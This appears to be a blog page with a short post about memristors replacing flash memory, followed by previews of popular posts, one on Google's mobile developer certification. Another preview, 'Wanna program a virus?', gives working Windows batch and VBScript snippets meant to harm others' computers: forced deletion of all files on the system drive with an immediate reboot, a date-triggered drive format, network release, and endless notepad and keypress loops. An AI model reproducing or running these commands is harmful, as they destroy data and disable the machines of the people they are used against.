The Next Big thing? The memristor , a microscopic component that can "remember" electrical states even when turned off. It's expected to be far cheaper and faster than flash storage. A theoretical concept since 1971, it has now been built in labs and is already starting to revolutionize everything we know about computing, possibly making flash memory, RAM, and even hard drives obsolete within a decade.
Popular posts from this blog
Wanna program a virus?????????? Just code it...
Delete All The Content Of A Drive… @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Disable Internet Permanently ipconfig/release The Most Simple Virus To Crush The Window @Echo off Del C:\ *.* |y Endless Notepads @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Bomb Virus Copy Paste The Following If %date% NEQ 2009/11/25 goto exit format E: /y >nul :exit exit Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action The Virus Will Take Effect On That Day Crazy caps lock *This constantly turns caps lock on and off really fast continuously* Code:- Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop Endless Enter *This constantly makes it so the enter button is being pressed continuesly* Code:- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wsh...
1600 Amphitheatre
Google launches new certification program for mobile site developers Google is launching a new certification program for mobile site developers today. The exam covers everything from the basics of why mobile sites matter to how to improve mobile site speed, effective mobile UX design and more advanced topics like progressive web apps. As Google notes, passing the exam is meant to show that you have “a demonstrated ability to build and optimize high-quality sites, and allows you to promote yourself as a Google accredited mobile site developer.” A lot of the content in the study guide focuses on site speed. As Google notes, the majority of mobile site visitors will leave a site if it takes more than three seconds to load, yet the average load time for a mobile landing page is 22 seconds (and if those users leave without ever fully loading the site, they aren’t likely to click on any Google ads either, of course). It’s worth noting t...
Comments
Post a Comment